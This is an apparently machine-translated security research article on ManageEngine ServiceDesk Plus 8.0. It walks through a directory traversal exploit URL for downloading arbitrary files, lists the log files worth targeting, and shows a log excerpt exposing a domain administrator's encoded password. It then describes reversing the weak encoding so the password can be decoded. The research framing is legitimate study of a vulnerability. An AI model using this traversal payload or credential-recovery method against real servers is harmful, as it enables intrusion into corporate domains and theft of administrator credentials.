Research on ManageEngine ServiceDesk encryption and decryption

Author: robot # sec-lab.org & bhst.org

[0x00] Overview
ManageEngine is mainly used in it o & M management solutions. IT contains many subsystems to meet various IT management needs. IT is often used in it o & M management of large enterprises. there are many applications in foreign countries and Chinese agents in China. this article discusses and learns the encryption and decryption methods of ServiceDesk, a sub-system.
The environment in this article is based on ManageEngine ServiceDesk 8.0.0. This version has a directory traversal download vulnerability. This product is developed based on Java and has good cross-platform performance, therefore, this article mainly analyzes the security exploitation ideas in Windows. The core is to study the background encryption and decryption methods.
Because I am a beginner in Java, I still hope to point out something wrong with the analysis. I also declare that this article is only used for research purposes and should not be used illegally. Otherwise, the consequences will be borne by me.
[0x01] vulnerability Exploitation
This vulnerability exists in ManageEngine ServiceDesk Plus 8.0. You can use this vulnerability to download any file. in Linux, we can get a lot of information, which I will not talk about here. there are not many things we can do in the Window. to address this vulnerability, the first idea is to download the configuration file. However, by setting up a local environment, we can find that the default configuration files of the system do not get much information, because the user's configuration information is written into the database, and the database mysql or mssql cannot be downloaded at runtime. here I will provide some sensitive file directories we need to view:
# User product registration information
C: \ ManageEngine \ ServiceDesk \ logs \ customerInfo.txt
# If you use the default postgreSQL database
C: \ ManageEngine \ ServiceDesk \ logs \ InitPgsqllog.txt
# Service port and configuration information
C: \ ManageEngine \ ServiceDesk \ logs \ configport.txt
# The default service log is very important, including the password hash in the domain environment
C: \ ManageEngine \ ServiceDesk \ server \ default \ log \ serverout0.txt
# System startup log, including the system version and running environment, used to determine the Database Type
C: \ ManageEngine \ ServiceDesk \ server \ default \ log \ boot. log
The vulnerability exploitation code is as follows:
Http: // localhost: 8080/workorder/FileDownload. jsp? Module = agent & FILENAME = % 20... \ [FileToDownload]
Note that the slash in this directory must be a backslash; otherwise, the system will prompt that the file does not exist.
In the Window, the environment is very depressing. I don't know what files to download to obtain sensitive information. Finally, in the log file C: \ ManageEngine \ ServiceDesk \ server \ default \ log \ serverout0.txt found domain password HASH. the encryption and decryption method is analyzed.
[0x02] research on encryption and decryption
First, we found the following records in the serverout0.txt file:
[00: 19: 39: 462] | [06-23-2013] | [com. adventnet. servicedesk. contract. internal. cleanActiveDirectory] | [INFO] | [18] |: DataObject of Domains: <WritableDataObject>
<Tables>
[DomainInfo, DomainLoginInfo, PasswordInfo, SDActiveDirectoryInfo] </Tables>
SelectQuery Object:
Select columnNames = [DomainInfo. DOMAINID, DomainInfo. COMMENTS, DomainInfo. DOMAINNAME, DomainInfo. DISCOVERYSTATUS, DomainInfo. ISPUBLIC, SDActiveDirectoryInfo. AD_ID, SDActiveDirectoryInfo. DOMAIN_ID, SDActiveDirectoryInfo. SERVER_NAME, DomainLoginInfo. DOMAINID, DomainLoginInfo. DOMAINLOGINNAME, DomainLoginInfo. PASSWORDID, PasswordInfo. PASSWORDID, PasswordInfo. DOMAINPASSWORD]
Criteria = (DomainInfo. domainid in ('20140901 '))
Number of Objects = 0
Starting row = 1
Order by columnNames = []
Table List = [DomainInfo AS DomainInfo, SDActiveDirectoryInfo AS SDActiveDirectoryInfo, DomainLoginInfo AS DomainLoginInfo, PasswordInfo AS PasswordInfo]
Joins = Join: = DomainInfo AS DomainInfo left join SDActiveDirectoryInfo AS SDActiveDirectoryInfo ON DomainInfo. DOMAINID = SDActiveDirectoryInfo. DOMAIN_ID, Join: = DomainInfo AS DomainInfo left join DomainLoginInfo AS DomainLoginInfo ON DomainInfo. DOMAINID = DomainLoginInfo. DOMAINID, Join: = DomainLoginInfo AS DomainLoginInfo left join PasswordInfo AS PasswordInfo ON DomainLoginInfo. PASSWORDID = PasswordInfo. PASSWORDID
SetLock = false
<JoinsInDO>
Join: = DomainInfo AS DomainInfo left join SDActiveDirectoryInfo AS SDActiveDirectoryInfo ON DomainInfo. DOMAINID = SDActiveDirectoryInfo. DOMAIN_ID
Join: = DomainInfo AS DomainInfo left join DomainLoginInfo AS DomainLoginInfo ON DomainInfo. DOMAINID = DomainLoginInfo. DOMAINID
Join: = DomainLoginInfo AS DomainLoginInfo left join PasswordInfo AS PasswordInfo ON DomainLoginInfo. PASSWORDID = PasswordInfo. PASSWORDID
</JoinsInDO>
<Operations>
</Operations>
<Rows>
<DomainInfo DOMAINID = "301" DOMAINNAME = "ITTONGLUREN. COM" CANONICALNAME = "null" DISCOVERYSTATUS = "UNDISCOVERED" COMMENTS = "" LASTDISCOVEREDTIME = "null" ISPUBLIC = "true"/>
<DomainLoginInfo DOMAINID = "301" DOMAINLOGINNAME = "administrator" PASSWORDID = "1"/>
<PasswordInfo PASSWORDID = "1" DOMAINPASSWORD = "e8c94uB8969Ib9678Y1" ALGORITHM = "null"/>
<SDActiveDirectoryInfo AD_ID = "1" DOMAIN_ID = "301" SERVER_NAME = "adserver-01f2fe" USER_NAME = "null" USER_PASSWORD = "null"/>
</Rows>
</WritableDataObject>
Here we get a very important information, DOMAINPASSWORD, so we must analyze how the 19-bit password is encrypted and decrypted. here I select cavaj. java. decomplier performs Reverse Analysis on java. through the log, we searched for the CleanActiveDirectory function and found an AdventNetContractAuditService. sar package, 01:

Open the jar package using rar, and find the corresponding class file through matching content, 02:

Load CleanActiveDirectory. class into cavaj and analyze it in its run function to find that the password in the log is written here. The Code is as follows: 03:


Here we get the Domain Information struct DomainInfo and the Encryption Class Encoder. At the same time, we found that this record was read from the database. I set up a local postgreSQL database. We can query it for 04:

This is the same as in the log, so the next step is to analyze the encoder class, the search will find that many jar packages contain this class, through repeated viewing, finally confirmed in adventnetservice1_common. the jar package contains the actual encryption and decryption implementation path: \ com \ adventnet \ servicedesk \ security \ encoder. class, 05:

In this function, we first analyze the encryption function convertToNewBase06:

The encryption process is very simple, but it only performs simple ASCII transformation. The decryption function also helps us write it through CleanActiveDirectory. the class file directly calls the convertFromBase function for decoding. the decryption is simple. Here I write a java file for decoding 07:




Here we will briefly describe how to compile java, download jdk environment installation from sun official, set environment variables, set the classpath path, and then go to the project directory to execute the command:
# Compile the java file to generate the. class file. The file name is case sensitive under the window.
Javac encoder. java
# Run java in the format of java + space + class name (the class name must be case sensitive)
Java encoder
After completion, you can run the encoding and decoding program.
[0x03] Summary
Java is not as responsible as you think. It is quite quick to get started. Especially for those with c/c ++ basics, this article does not have much analysis, focusing on the encryption box decryption module. please contact us if you have any questions: http://www.sec-lab.org or www.bhst.org.
[0x04] References
[1] download: http://www.manageengine.com/products/service-desk/91677414/ManageEngine_ServiceDesk_Plus.exe
[2] manageengine Database Management
Http://www.manageengine.com/products/service-desk/help/adminguide/introduction/setting_up_database.html
[3] Chinese agent: http://www.zohocorp.com.cn/manageengine/